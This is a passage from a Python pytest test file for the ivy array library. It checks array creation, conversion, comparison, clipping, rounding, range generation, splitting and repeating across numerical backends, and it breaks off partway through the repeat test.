# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
    "object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
    "dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
    "from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
    """ivy.array wraps lists / numpy arrays into a native array with correct shape and values."""
    if call in [helpers.mx_call] and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    if from_numpy:
        # also exercise construction from a numpy array rather than a raw list
        object_in = np.array(object_in)
    # smoke test
    ret = ivy.array(object_in, dtype, dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: shape must match the numpy reference
    reference = np.array(object_in)
    assert ret.shape == reference.shape
    # value test against the numpy reference cast to the requested dtype
    assert np.allclose(call(ivy.array, object_in, dtype, dev), reference.astype(dtype))
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support string devices
        return
# copy array
@pytest.mark.parametrize(
    "x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
    "dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
    """ivy.copy_array returns an equal but distinct native array."""
    if call in [helpers.mx_call] and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    # smoke test
    x = ivy.array(x, dtype, dev)
    copied = ivy.copy_array(x)
    # type test
    assert ivy.is_native_array(copied)
    # cardinality test
    assert copied.shape == x.shape
    # value test
    assert np.allclose(ivy.to_numpy(copied), ivy.to_numpy(x))
    # the copy must be a new object, not an alias of the input
    assert id(copied) != id(x)
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support string devices
        return
# array_equal
@pytest.mark.parametrize(
    "x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
                      ([[0.], [1.]], [[0.], [1.]], True),
                      ([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
    "dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
    """ivy.array_equal produces the expected equality verdict for a pair of arrays."""
    if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
        # mxnet does not support int16, and does not support bool for broadcast_equal method used
        pytest.skip()
    x0_raw, x1_raw, expected = x0_n_x1_n_res
    # smoke test
    x0 = ivy.array(x0_raw, dtype, dev)
    x1 = ivy.array(x1_raw, dtype, dev)
    res = ivy.array_equal(x0, x1)
    # type test
    assert ivy.is_native_array(x0)
    assert ivy.is_native_array(x1)
    assert isinstance(res, bool) or ivy.is_native_array(res)
    # value test
    assert res == expected
# arrays_equal
@pytest.mark.parametrize(
    "xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
    """ivy.arrays_equal over a list of arrays produces the expected verdict."""
    xs, expected = xs_n_res
    # smoke test
    arrays = [ivy.array(x, dtype, dev) for x in xs]
    res = ivy.arrays_equal(arrays)
    # type test
    for arr in arrays:
        assert ivy.is_native_array(arr)
    assert isinstance(res, bool) or ivy.is_native_array(res)
    # value test
    assert res == expected
# equal
@pytest.mark.parametrize(
    "x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
                              ([0.], [1.], [0.], False, False),
                              ([0.], [1.], [0.], True, [[True, False, True],
                                                        [False, True, False],
                                                        [True, False, True]]),
                              ({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
                                                                    [True, True, False],
                                                                    [False, False, True]])])
@pytest.mark.parametrize(
    "to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
    """ivy.all_equal across three items, optionally returning a pairwise equality matrix."""
    x0, x1, x2, equality_matrix, expected = x0_n_x1_n_x2_em_n_res
    # smoke test: lists may be promoted to native arrays first
    if to_array and isinstance(x0, list):
        x0, x1, x2 = (ivy.array(v, dev=dev) for v in (x0, x1, x2))
    res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
    # value test
    if equality_matrix:
        assert np.array_equal(ivy.to_numpy(res), np.array(expected))
    else:
        assert res == expected
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support variable number of input arguments
        return
# to_numpy
@pytest.mark.parametrize(
    "object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
    "dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
    """ivy.to_numpy converts a native array back into a numpy ndarray."""
    if call in [helpers.mx_call] and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    if call in [helpers.tf_graph_call]:
        # to_numpy() requires eager execution
        pytest.skip()
    # smoke test
    ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
    # type test
    assert isinstance(ret, np.ndarray)
    # cardinality test: shape matches the numpy reference
    reference = np.array(object_in)
    assert ret.shape == reference.shape
    # value test against the reference cast to the requested dtype
    assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), reference.astype(dtype))
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support numpy conversion
        return
# to_scalar
@pytest.mark.parametrize(
    "object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
    "dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
    """ivy.to_scalar unwraps a single-element array into a python scalar."""
    if call in [helpers.mx_call] and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    if call in [helpers.tf_graph_call]:
        # to_scalar() requires eager execution
        pytest.skip()
    # smoke test
    ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
    # the numpy .item() result defines both the expected type and value
    expected = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
    # type test
    assert isinstance(ret, type(expected))
    # value test
    assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == expected
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support scalar conversion
        return
# to_list
@pytest.mark.parametrize(
    "object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
    "dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
    """ivy.to_list converts a native array into a (possibly nested) python list."""
    if call in [helpers.mx_call] and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    if call in [helpers.tf_graph_call]:
        # to_list() requires eager execution
        pytest.skip()
    # smoke test
    ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
    # type test
    assert isinstance(ret, list)
    # cardinality test: same nested-list shape as the input
    assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
    # value test against the numpy reference cast to the requested dtype
    assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
                       np.array(object_in).astype(dtype))
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support list conversion
        return
# shape
@pytest.mark.parametrize(
    "object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "as_tensor", [None, True, False])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
    """ivy.shape returns the input's shape, as a native array or a tuple per ``as_tensor``."""
    # smoke test
    if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
    # type test
    if as_tensor:
        assert ivy.is_native_array(ret)
    else:
        assert isinstance(ret, tuple)
        # promote the tuple so the remaining checks share one code path
        ret = ivy.array(ret)
    # cardinality test
    assert ret.shape[0] == len(np.asarray(object_in).shape)
    # value test
    assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support Union
        return
# get_num_dims
@pytest.mark.parametrize(
    "object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "as_tensor", [None, True, False])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
    """ivy.get_num_dims returns the input's rank, as a native scalar array or an int."""
    # smoke test
    if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
    # type test
    if as_tensor:
        assert ivy.is_native_array(ret)
    else:
        assert isinstance(ret, int)
        # promote to an array so the remaining checks share one code path
        ret = ivy.array(ret)
    # cardinality test: the rank itself is a 0-dim value
    assert list(ret.shape) == []
    # value test
    assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
    # compilation test
    if call in [helpers.torch_call]:
        # pytorch scripting does not support Union
        return
# minimum
@pytest.mark.parametrize(
    "xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
    """ivy.minimum matches numpy's element-wise minimum, including broadcasting."""
    x_raw, y_raw = xy
    if (isinstance(x_raw, Number) or isinstance(y_raw, Number)) \
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    # smoke test
    x = tensor_fn(x_raw, dtype, dev)
    y = tensor_fn(y_raw, dtype, dev)
    ret = ivy.minimum(x, y)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: the result broadcasts to the higher-rank operand's shape
    expected_shape = x.shape if len(x.shape) > len(y.shape) else y.shape
    assert ret.shape == expected_shape
    # value test against the numpy backend reference
    assert np.array_equal(
        call(ivy.minimum, x, y),
        np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
    "xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
    """ivy.maximum matches numpy's element-wise maximum, including broadcasting."""
    x_raw, y_raw = xy
    if (isinstance(x_raw, Number) or isinstance(y_raw, Number)) \
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    # smoke test
    x = tensor_fn(x_raw, dtype, dev)
    y = tensor_fn(y_raw, dtype, dev)
    ret = ivy.maximum(x, y)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: the result broadcasts to the higher-rank operand's shape
    expected_shape = x.shape if len(x.shape) > len(y.shape) else y.shape
    assert ret.shape == expected_shape
    # value test against the numpy backend reference
    assert np.array_equal(
        call(ivy.maximum, x, y),
        np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
    "x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
                    ([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
    """ivy.clip bounds x between min_val and max_val, matching the numpy backend."""
    # smoke test
    if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x_min_n_max[0], dtype, dev)
    min_val = tensor_fn(x_min_n_max[1], dtype, dev)
    max_val = tensor_fn(x_min_n_max[2], dtype, dev)
    if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
            and call in [helpers.mx_call]:
        # mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
        pytest.skip()
    ret = ivy.clip(x, min_val, max_val)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: result takes the highest-rank shape among the three inputs
    max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
    assert ret.shape == max_shape
    # value test
    assert np.array_equal(call(ivy.clip, x, min_val, max_val),
                          np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
@pytest.mark.parametrize(
    "x_max_norm_n_p_val_clipped",
    [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
     ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
     ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
    """ivy.clip_vector_norm limits the p-norm of x to max_norm."""
    if call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    # smoke test
    x_raw, max_norm, p_val, clipped = x_max_norm_n_p_val_clipped
    x = tensor_fn(x_raw, dtype, dev)
    ret = ivy.clip_vector_norm(x, max_norm, p_val)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: scalar inputs come back with shape (1,)
    expected_shape = x.shape if len(x.shape) else (1,)
    assert ret.shape == expected_shape
    # value test
    assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
    # compilation test
    if call is helpers.torch_call:
        # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
        return
# round
@pytest.mark.parametrize(
    "x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
    """ivy.round produces the expected rounded values."""
    x_raw, expected = x_n_x_rounded
    if (isinstance(x_raw, Number) or isinstance(expected, Number)) \
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    # smoke test
    x = tensor_fn(x_raw, dtype, dev)
    ret = ivy.round(x)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    assert ret.shape == x.shape
    # value test
    assert np.array_equal(call(ivy.round, x), np.array(expected))
# floormod
@pytest.mark.parametrize(
    "x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
                                 ([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
    """ivy.floormod produces the expected element-wise floored remainders."""
    x_raw, divisor_raw, expected = x_n_divisor_n_x_floormod
    if (isinstance(x_raw, Number) or isinstance(divisor_raw, Number) or
            isinstance(expected, Number)) \
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    # smoke test
    x = tensor_fn(x_raw, dtype, dev)
    divisor = ivy.array(divisor_raw, dtype, dev)
    ret = ivy.floormod(x, divisor)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.floormod, x, divisor), np.array(expected))
# ceil
@pytest.mark.parametrize(
    "x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
    """ivy.ceil produces the expected element-wise ceiling values."""
    x_raw, expected = x_n_x_ceiled
    if (isinstance(x_raw, Number) or isinstance(expected, Number)) \
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    # smoke test
    x = tensor_fn(x_raw, dtype, dev)
    ret = ivy.ceil(x)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.ceil, x), np.array(expected))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
    "stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
    """ivy.arange builds the expected range for (stop[, start[, step]]) call forms."""
    # smoke test
    stop, start, step = stop_n_start_n_step
    if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    if tensor_fn == helpers.var_fn and call is helpers.torch_call:
        # pytorch does not support arange using variables as input
        pytest.skip()
    # build the positional argument list; None entries are simply omitted
    args = list()
    if stop:
        stop = tensor_fn(stop, dtype, dev)
        args.append(stop)
    if start:
        start = tensor_fn(start, dtype, dev)
        args.append(start)
    if step:
        step = tensor_fn(step, dtype, dev)
        args.append(step)
    ret = ivy.arange(*args, dtype=dtype, dev=dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: length is (stop - start) / step, integer-truncated
    assert ret.shape == (int((ivy.to_list(stop) -
                              (ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
    # value test
    assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
                          np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
    "start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
                                  [[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
    """ivy.linspace interpolates num points from start to stop along the given axis."""
    # smoke test
    start, stop, num, axis = start_n_stop_n_num_n_axis
    if (isinstance(start, Number) or isinstance(stop, Number))\
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    start = tensor_fn(start, dtype, dev)
    stop = tensor_fn(stop, dtype, dev)
    ret = ivy.linspace(start, stop, num, axis, dev=dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: the new num-sized axis is inserted at `axis`
    # (or appended when axis is None or -1)
    target_shape = list(start.shape)
    target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
    assert ret.shape == tuple(target_shape)
    # value test
    assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
                       np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
    "start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
                                         [[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
    """ivy.logspace interpolates num points from base**start to base**stop along the axis."""
    # smoke test
    start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
    if (isinstance(start, Number) or isinstance(stop, Number))\
            and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    start = tensor_fn(start, dtype, dev)
    stop = tensor_fn(stop, dtype, dev)
    ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: the new num-sized axis is inserted at `axis`
    # (or appended when axis is None or -1)
    target_shape = list(start.shape)
    target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
    assert ret.shape == tuple(target_shape)
    # value test
    assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
                       ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# unstack
@pytest.mark.parametrize(
    "x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
    """ivy.unstack splits x along `axis` into a list of slices with that axis removed."""
    # smoke test
    x, axis = x_n_axis
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.unstack(x, axis)
    # type test
    assert isinstance(ret, list)
    # cardinality test: wrap a negative axis into the valid range
    # (0-dim inputs fall through to the degenerate -1 value, unused below)
    axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
    if x.shape == ():
        expected_shape = ()
    else:
        # each slice keeps every dim of x except the unstacked axis
        expected_shape = list(x.shape)
        expected_shape.pop(axis_val)
    assert ret[0].shape == tuple(expected_shape)
    # value test
    assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
    "x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
                             ([[0., 1., 2., 3.]], 2, 1, False),
                             ([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
                             ([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
                             ([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
    """ivy.split divides x along `axis` into equal chunks or explicitly-sized pieces."""
    # smoke test
    x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
    # type test
    assert isinstance(ret, list)
    # cardinality test: wrap a negative axis into the valid range
    axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
    if x.shape == ():
        expected_shape = ()
    elif isinstance(num_or_size_splits, int):
        # equal chunks: with_remainder lets the first chunk carry the ceil of the division
        expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
                                for i, item in enumerate(x.shape)])
    else:
        # explicit sizes: the first chunk takes the first requested size
        expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
    assert ret[0].shape == expected_shape
    # value test
    pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
    true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
    for pred, true in zip(pred_split, true_split):
        assert np.allclose(pred, true)
    # compilation test
    if call is helpers.torch_call:
        # pytorch scripting does not support Union or Numbers for type hinting
        return
# repeat
@pytest.mark.parametrize(
    "x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
    """ivy.repeat tiles x's elements along `axis`, with int, list and array repeat specs."""
    # smoke test
    x, reps_raw, axis = x_n_reps_n_axis
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    if not isinstance(reps_raw, int) and call is helpers.mx_call:
        # mxnet repeat only supports integer repeats
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    x_shape = list(x.shape)
    if call not in [helpers.jnp_call, helpers.torch_call]:
        # jax and pytorch repeat do not support repeats specified as lists
        ret_from_list = ivy.repeat(x, reps_raw, axis)
    reps = ivy.array(reps_raw, 'int32', dev)
    if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
        ret = ivy.repeat(x, reps_raw, axis)
    else:
        ret = ivy.repeat(x, reps, axis)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    if x.shape == ():
        # a scalar repeated n times becomes a length-n vector
        expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
    else:
        # per-element repeats: the target axis grows to the sum of the repeat counts
        axis_wrapped = axis % len(x_shape)
        expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
    assert list(ret.shape) == expected_shape
    # value test
    if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
        assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
